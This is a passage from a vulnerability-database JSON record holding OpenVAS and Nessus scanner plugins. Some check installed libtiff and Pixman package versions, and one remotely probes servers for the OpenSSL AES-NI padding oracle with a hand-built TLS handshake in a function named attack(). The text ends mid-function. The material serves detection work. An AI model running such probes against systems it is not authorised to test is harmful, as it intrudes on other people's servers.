Eset32, Kaspersky etc.\r\n\r\n\r\n====== Thanks ===================================\r\nKacper and Smash_ from DEVILTEAM for technical support.\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24685"}], "openvas": [{"lastseen": "2019-05-29T18:33:30", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in the Tag Image File\nFormat (TIFF) library and its associated tools.\n\nCVE-2017-11335\n\nA heap based buffer overflow via a PlanarConfig=Contig image, which\ncauses an out-of-bounds write (related to the ZIPDecode function). A\ncrafted input may lead to a remote denial of service attack or an\narbitrary code execution attack.\n\nCVE-2017-12944\n\nA mishandling of memory allocation for short files allows attackers\nto cause a denial of service (allocation failure and application\ncrash) during a tiff2pdf invocation.\n\nCVE-2017-13726\n\nA reachable assertion abort allows a crafted input to lead to a\nremote denial of service attack.\n\nCVE-2017-13727\n\nA reachable assertion abort allows a crafted input to lead to a\nremote denial of service attack.", "modified": "2019-03-18T00:00:00", "published": "2018-02-07T00:00:00", "id": "OPENVAS:1361412562310891093", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891093", "title": "Debian LTS Advisory ([SECURITY] [DLA 1093-1] tiff security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1093.nasl 14281 2019-03-18 14:53:48Z cfischer $\n#\n# Auto-generated from advisory DLA 1093-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891093\");\n script_version(\"$Revision: 14281 $\");\n script_cve_id(\"CVE-2017-11335\", \"CVE-2017-12944\", \"CVE-2017-13726\", \"CVE-2017-13727\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1093-1] tiff security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:53:48 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00010.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"tiff on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n4.0.2-6+deb7u16.\n\nWe recommend that you upgrade your tiff packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the Tag Image File\nFormat (TIFF) library and its associated tools.\n\nCVE-2017-11335\n\nA heap based buffer overflow via a PlanarConfig=Contig image, which\ncauses an out-of-bounds write (related to the ZIPDecode function). A\ncrafted input may lead to a remote denial of service attack or an\narbitrary code execution attack.\n\nCVE-2017-12944\n\nA mishandling of memory allocation for short files allows attackers\nto cause a denial of service (allocation failure and application\ncrash) during a tiff2pdf invocation.\n\nCVE-2017-13726\n\nA reachable assertion abort allows a crafted input to lead to a\nremote denial of service attack.\n\nCVE-2017-13727\n\nA reachable assertion abort allows a crafted input to lead to a\nremote denial of service attack.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libtiff-doc\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtiff5\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtiff5-alt-dev\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtiff5-dev\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtiffxx5\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-01T02:18:19", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in the Tag Image File\nFormat (TIFF) library and its associated tools.\n\nCVE-2017-11335\n\nA heap based buffer overflow via a PlanarConfig=Contig image, which\ncauses an out-of-bounds write (related to the ZIPDecode function). A\ncrafted input may lead to a remote denial of service attack or an\narbitrary code execution attack.\n\nCVE-2017-12944\n\nA mishandling of memory allocation for short files allows attackers to\ncause a denial of service (allocation failure and application crash)\nduring a tiff2pdf invocation.\n\nCVE-2017-13726\n\nA reachable assertion abort allows a crafted input to lead to a remote\ndenial of service attack.\n\nCVE-2017-13727\n\nA reachable assertion abort allows a crafted input to lead to a remote\ndenial of service attack.\n\nFor Debian 7 ", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-1093.NASL", "href": "https://www.tenable.com/plugins/nessus/103093", "published": "2017-09-11T00:00:00", "title": "Debian DLA-1093-1 : tiff security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1093-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103093);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/07/09 12:26:58\");\n\n script_cve_id(\"CVE-2017-11335\", \"CVE-2017-12944\", \"CVE-2017-13726\", \"CVE-2017-13727\");\n\n script_name(english:\"Debian DLA-1093-1 : tiff security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Tag Image File\nFormat (TIFF) library and its associated tools.\n\nCVE-2017-11335\n\nA heap based buffer overflow via a PlanarConfig=Contig image, which\ncauses an out-of-bounds write (related to the ZIPDecode function). A\ncrafted input may lead to a remote denial of service attack or an\narbitrary code execution attack.\n\nCVE-2017-12944\n\nA mishandling of memory allocation for short files allows attackers to\ncause a denial of service (allocation failure and application crash)\nduring a tiff2pdf invocation.\n\nCVE-2017-13726\n\nA reachable assertion abort allows a crafted input to lead to a remote\ndenial of service attack.\n\nCVE-2017-13727\n\nA reachable assertion abort allows a crafted input to lead to a remote\ndenial of service attack.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.0.2-6+deb7u16.\n\nWe recommend that you upgrade your tiff packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00010.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/tiff\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiff-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiff-opengl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiff-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiff5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiff5-alt-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiff5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiffxx5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libtiff-doc\", reference:\"4.0.2-6+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtiff-opengl\", reference:\"4.0.2-6+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtiff-tools\", reference:\"4.0.2-6+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtiff5\", reference:\"4.0.2-6+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtiff5-alt-dev\", reference:\"4.0.2-6+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtiff5-dev\", reference:\"4.0.2-6+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtiffxx5\", reference:\"4.0.2-6+deb7u16\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:40:45", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201612-37\n(Pixman: Buffer overflow)\n\n In pixman-general, careless computations done with the ‘dest_buffer’\n pointer may overflow, failing the buffer upper limit check.\n \nImpact :\n\n A remote attacker could possibly cause a Denial of Service condition, or\n execute arbitrary code with the privileges of the process.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-201612-37.NASL", "href": "https://www.tenable.com/plugins/nessus/95740", "published": "2016-12-13T00:00:00", "title": "GLSA-201612-37 : Pixman: Buffer overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201612-37.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95740);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2017/10/02 21:12:27 $\");\n\n script_xref(name:\"GLSA\", value:\"201612-37\");\n\n script_name(english:\"GLSA-201612-37 : Pixman: Buffer overflow\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201612-37\n(Pixman: Buffer overflow)\n\n In pixman-general, careless computations done with the ‘dest_buffer’\n pointer may overflow, failing the buffer upper limit check.\n \nImpact :\n\n A remote attacker could possibly cause a Denial of Service condition, or\n execute arbitrary code with the privileges of the process.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.x.org/archives/xorg-announce/2015-September/002637.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201612-37\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Pixman users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-libs/pixman-0.32.8'\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"Medium\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:pixman\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"x11-libs/pixman\", unaffected:make_list(\"ge 0.32.8\"), vulnerable:make_list(\"lt 0.32.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Pixman\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-10-28T21:00:39", "bulletinFamily": "scanner", "description": "The remote host is affected by a man-in-the-middle (MitM) information\ndisclosure vulnerability due to an error in the implementation of\nciphersuites that use AES in CBC mode with HMAC-SHA1 or HMAC-SHA256.\nThe implementation is specially written to use the AES acceleration\navailable in x86/amd64 processors (AES-NI). The error messages\nreturned by the server allow allow a man-in-the-middle attacker to\nconduct a padding oracle attack, resulting in the ability to decrypt\nnetwork traffic.", "modified": "2016-06-13T00:00:00", "id": "OPENSSL_AES_NI_PADDING_ORACLE.NASL", "href": "https://www.tenable.com/plugins/nessus/91572", "published": "2016-06-13T00:00:00", "title": "OpenSSL AES-NI Padding Oracle MitM Information Disclosure", "type": "nessus", "sourceData": "#TRUSTED 0fb281a3ebf948f329713d314d3da1ac93829cfe44bc153b317085dc6e4f059c6ebbd6f75a215c2f0f8997a147763a749aa7071ce3905a6f558c266f058241017bc4a89519e6e47fd5e89c21a83a487d55dbe054ed06216e15e3f848429bc3943651d56e0944fb65217f281ba5eb872ac05c5827f849b3f781584df1f6addbcd9976b51800622ca66b847f54493cb843a730658026b16baf414314fbc612ea452aec55c2e71140424cd4d296798f5d4c5188f0f9b039ad28f07d77f70efef42a09a0bc912084d9de4e2fc4f396b556bd60c53e83ade27ef0ba9ca293b7547ffa54d8981525120b206fc3de2f3202d5d91acab899c1ed68436ece43fb22630506236f29d5212ec2db1a6687fd7b23f1091ecad320f03a5363aa9d2447b7a4781ddf9ff1ef0570373004134fee731966d85e4868aa17d4e0e930b424331fb0b8557a871d8e535671b83ea24334dd88eb1709b52fe11dad0c5c1f2593709c23a76ffd35d64438dbe59fb7cc360cafcd0a3d3f20fc0c44df1c46d62db5bb2706995f0ee4991e29da0c82b6340f1dc7fbda94bc6f0eb278ff52ab8ee13d25a1fb6a6a8c049294f3a7edb888ebc1bc0df6f31969a4c23bcd48b598c6810391c6b3af6d66f3fa6d7cccae4d4de75fee5978207823bdb8ecce84afc2e82605ab9ed144020a0bd8f223669be695daf5d9b5e9f5044fd024345ce57c6b8ac1a7c020cc32d8\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91572);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/04/11\");\n\n script_cve_id(\"CVE-2016-2107\");\n script_bugtraq_id(89760);\n script_xref(name:\"EDB-ID\", value:\"39768\");\n\n script_name(english:\"OpenSSL AES-NI Padding Oracle MitM Information Disclosure\");\n script_summary(english:\"Checks if the server sends a RECORD_OVERFLOW alert to a crafted TLS handshake.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"It was possible to obtain sensitive information from the remote host\nwith TLS-enabled services.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by a man-in-the-middle (MitM) information\ndisclosure vulnerability due to an error in the implementation of\nciphersuites that use AES in CBC mode with HMAC-SHA1 or HMAC-SHA256.\nThe implementation is specially written to use the AES acceleration\navailable in x86/amd64 processors (AES-NI). The error messages\nreturned by the server allow allow a man-in-the-middle attacker to\nconduct a padding oracle attack, resulting in the ability to decrypt\nnetwork traffic.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blog.filippo.io/luckyminus20/\");\n # https://web-in-security.blogspot.com/2016/05/curious-padding-oracle-in-openssl-cve.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7647e9f0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20160503.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to OpenSSL version 1.0.1t / 1.0.2h or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssl_supported_versions.nasl\");\n script_require_ports(\"SSL/Supported\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"x509_func.inc\");\ninclude(\"rsync.inc\");\ninclude(\"acap_func.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"imap_func.inc\");\ninclude(\"ldap_func.inc\");\ninclude(\"nntp_func.inc\");\ninclude(\"pop3_func.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"telnet2_func.inc\");\ninclude(\"xmpp_func.inc\");\ninclude(\"ssl_funcs.inc\");\ninclude(\"string.inc\");\n\n##\n# Checks whether a cipher is in a list of cipher suites.\n#\n# @anonparam cipher Cipher in question.\n# @anonparam ciphers List of cipher suites.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction tls_cipher_in_list()\n{\n local_var cipher, ciphers, i, id, len;\n\n cipher = _FCT_ANON_ARGS[0];\n ciphers = _FCT_ANON_ARGS[1];\n\n len = strlen(ciphers);\n for (i = 0; i < len; i += 2)\n {\n id = substr(ciphers, i, i + 2 - 1);\n if (cipher == id) return TRUE;\n }\n\n return FALSE;\n}\n\n##\n# Split the key block into IVs, cipher keys, and MAC keys.\n#\n# @anonparam keyblk Key block derived from the master secret.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction tls_set_keys(cipher_desc, keyblk)\n{\n local_var mac_size, iv_size, key_size, pos, tls;\n\n # Determine the size of the key block's fields.\n if ('Mac=SHA1' >< cipher_desc) mac_size = 20;\n else if ('Mac=SHA256' >< cipher_desc) mac_size = 32;\n else return FALSE;\n\n if ('Enc=AES-CBC(128)' >< cipher_desc) { key_size = 16; iv_size = 16; }\n else if ('Enc=AES-CBC(256)' >< cipher_desc) { key_size = 32; iv_size = 16; }\n else return FALSE;\n\n # Ensure the block is big enough.\n if (strlen(keyblk) < 2 * (mac_size + key_size + iv_size))\n return FALSE;\n\n # Extract the data from the key block.\n pos = 0;\n tls['enc_mac_key'] = substr(keyblk, pos, pos + mac_size - 1); pos += mac_size;\n tls['dec_mac_key'] = substr(keyblk, pos, pos + mac_size - 1); pos += mac_size;\n tls['enc_key'] = substr(keyblk, pos, pos + key_size - 1); pos += key_size;\n tls['dec_key'] = substr(keyblk, pos, pos + key_size - 1); pos += key_size;\n tls['enc_iv'] = substr(keyblk, pos, pos + iv_size - 1); pos += iv_size;\n tls['dec_iv'] = substr(keyblk, pos, pos + iv_size - 1);\n\n return tls;\n}\n\n##\n##\n# Tries to make a TLS connection to the server.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction attack(port, ciphers)\n{\n local_var soc, data, rec, srv_random, clt_random, version, cipher_desc;\n local_var cert, clt_cert_requested, skex, premaster, n, e, dh_privkey;\n local_var ckex, keyblk, tls_keys, tls_ciphertext, pubkey;\n\n # Get a socket to perform a handshake.\n soc = open_sock_ssl(port);\n if (!soc)\n # XXX-ALW Fix this error message\n return [FALSE, \"open_sock_ssl\", \"Couldn't begin SSL handshake\"];\n\n data = client_hello(\n v2hello:FALSE,\n version:mkword(TLS_10), # Record-layer version (RFC5246 Appendix E)\n maxver:mkword(TLS_12), # Handshake version; maximum we support\n cipherspec:ciphers,\n extensions:tls_ext_ec(keys(curve_nid.tls))\n );\n send(socket:soc, data:data);\n rec = ssl_parse(blob:data);\n # Hang onto the Client Random; we need it to derive keys later.\n clt_random = mkdword(rec['time']) + rec['random'];\n\n # Read records one at a time. Expect to see at a minimum:\n # ServerHello, Certificate, and ServerHelloDone.\n while (TRUE)\n {\n # Receive a record from the server.\n data = recv_ssl(socket:soc);\n if (isnull(data))\n {\n close(soc);\n return [FALSE, \"recv_ssl\", \"Did not receive expected ServerHello, ServerCertificate, etc.\"];\n }\n\n # ServerHello: Extract the random data for computation of keys.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO\n );\n\n if (!isnull(rec))\n {\n # If server asks for version less than TLS 1.0 or higher than TLS 1.2, fail.\n if (rec['handshake_version'] < TLS_10 || rec['handshake_version'] > TLS_12)\n return [FALSE, \"handshake_version\", \"Server does not support TLS 1.0, 1.1, or 1.2\"];\n\n # Use the TLS version the server wants\n version = rec['handshake_version'];\n\n srv_random = mkdword(rec['time']) + rec['random'];\n\n # Wacko SSL servers might return a cipher suite not in the\n # client's request list.\n if (!tls_cipher_in_list(mkword(rec['cipher_spec']), ciphers))\n {\n close(soc);\n return [FALSE, \"cipher_spec\", \"Server ignored our list of supported ciphers\"];\n }\n\n # Store the negotiated cipher suite.\n cipher_desc = ciphers_desc[cipher_name(id:rec['cipher_spec'])];\n\n if (isnull(cipher_desc))\n {\n close(soc);\n return [FALSE, \"cipher_spec\", \"Assertion failure\"];\n }\n }\n\n # Certificate: Extract the server's public key.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE\n );\n\n if (!isnull(rec) && max_index(rec['certificates']) > 0)\n {\n # First cert in the chain should be the server cert.\n cert = parse_der_cert(cert:rec['certificates'][0]);\n if (isnull(cert))\n {\n close(soc);\n return [FALSE, \"parse_der_cert\", \"Failed to parse server's certificate\"];\n }\n cert = cert['tbsCertificate'];\n }\n\n # Server Key Exchange.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_KEY_EXCHANGE\n );\n\n if (!isnull(rec['data']))\n skex = ssl_parse_srv_kex(blob:rec['data'], cipher:cipher_desc, version:version);\n\n # Certificate Request.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE_REQUEST\n );\n\n if (!isnull(rec['data']))\n clt_cert_requested = TRUE;\n\n # Server Hello Done.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO_DONE\n );\n\n # When we get a ServerHelloDone, it's our turn to send again.\n if (!isnull(rec))\n break;\n\n # Is it an alert?\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_ALERT\n );\n\n if (!isnull(rec))\n {\n close(soc);\n return [FALSE, \"handshake_failure\", \"Server sent alert to ClientHello. Level: \" + rec['level'] + \", description: \" + rec['description']];\n }\n }\n\n # Will contain an empty ClientCertificate (if requested), ClientKeyExchange,\n data = '';\n\n # Create an empty client certificate if one is requested.\n if (clt_cert_requested)\n {\n # Send an empty certificate for now. TLSv1.0 says the client can\n # send an empty certificate.\n data += ssl_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n version:version,\n data:ssl_mk_handshake_msg(\n type : SSL3_HANDSHAKE_TYPE_CERTIFICATE,\n data : ssl_vldata_put(data:NULL,len:3)\n )\n );\n }\n\n # Process ServerCertificate and ServerKeyExchange messages.\n if (cipher_desc =~ \"Kx=RSA[(|]\")\n {\n if (isnull(cert))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"Server selected RSA key exchange but didn't provide a certificate\"];\n }\n\n if (isnull(cert['subjectPublicKeyInfo']) || isnull(cert['subjectPublicKeyInfo'][1]))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"A server certificate with an unsupported algorithm was found.\"];\n }\n\n n = cert['subjectPublicKeyInfo'][1][0];\n e = cert['subjectPublicKeyInfo'][1][1];\n\n if (isnull(n) || isnull(e))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"Failed to extract public key from server certificate.\"];\n }\n\n premaster = mkword(TLS_12) + rand_str(length:46);\n\n # Encrypt the premaster secret with server's RSA public key.\n ckex = rsa_public_encrypt(data:premaster, n:n, e:e);\n\n # It looks like TLS 1.0 and up prepend a two-byte length, but the\n # RFC is vague.\n if (version >= TLS_10)\n ckex = ssl_vldata_put(data:ckex, len:2);\n }\n else if (cipher_desc =~ \"Kx=DH[(|]\")\n {\n if (isnull(skex))\n {\n close(soc);\n return [FALSE, 